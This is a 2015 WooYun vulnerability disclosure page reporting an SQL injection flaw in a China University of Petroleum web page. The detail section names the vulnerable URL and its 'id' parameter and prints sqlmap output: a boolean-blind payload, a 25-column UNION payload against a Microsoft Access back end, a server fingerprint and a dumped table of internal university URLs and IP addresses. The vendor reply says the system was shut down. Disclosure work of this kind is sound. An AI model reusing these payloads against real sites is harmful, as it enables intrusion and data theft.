当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159862

漏洞标题:中国石油大学某站sql注入漏洞

相关厂商:中国石油大学

漏洞作者: 恋锋

提交时间:2015-12-10 12:17

修复时间:2015-12-14 15:30

公开时间:2015-12-14 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

中国石油大学某站sql注入漏洞

详细说明:

1、存在漏洞的站点

http://ccce.upc.edu.cn/shiyan/list.asp?id=895


2、可注入参数:id
3、已获取数据库部分数据
a.数据库类型

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=895 AND 3387=3387
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-2971 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(120)&CHR(107)&CHR(113)&CHR(109)&CHR(70)&CHR(82)&CHR(75)&CHR(117)&CHR(102)&CHR(88)&CHR(122)&CHR(75)&CHR(122)&CHR(113)&CHR(118)&CHR(106)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---


b.部分表及表数据

---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+-----+
| url |
+-----+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


Table: url
[10 entries]
+----+-------------------------------------------------------------------------------------+------+-------------------+
| id | url | data | title |
+----+-------------------------------------------------------------------------------------+------+-------------------+
| 53 | http://202.194.153.254:8080/ | <blank> | V\\?feNf |
| 54 | http://jwc.hdpu.edu.cn/jwc/ | <blank> | eYR\\?a1Y\x04 |
| 56 | http://rsc.hdpu.edu.cn/ | <blank> | N\\?baN\\?8bY\x04 |
| 58 | http://202.194.144.6/cwcx.asp?classid=52&classLevel=firstClass | <blank> | <blank> |
| 59 | http://gs.hdpu.edu.cn/ | <blank> | x\x14zvu\x1f |
| 60 | http://www.upc.edu.cn/ | <blank> | [fh!N; |
| 63 | http://202.194.145.242/blogcmmt/sheduls/tasklistform.php?op=calclist&dmid=upcoffice | <blank> | [fh!e\\?e5S\\?86 |
| 64 | http://wlzx.hdpu.edu.cn/upc/kjc/ | <blank> | y\\?d1b\\?80Y\x04 |
| 65 | http://bbs.hdpu.edu.cn/ | <blank> | <blank> |
| 66 | http://news.upc.edu.cn/nettv.htm | <blank> | \x7fQ~\\?dcu5 |
+----+-------------------------------------------------------------------------------------+------+-------------------+

漏洞证明:

参见详细说明

修复方案:

对输入内容严格过滤

版权声明:转载请注明来源 恋锋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-14 15:29

厂商回复:

系统已经关停

最新状态:

2015-12-14:系统已经关停,感谢您对中国石油大学网络信息的关注。


漏洞评价:

评价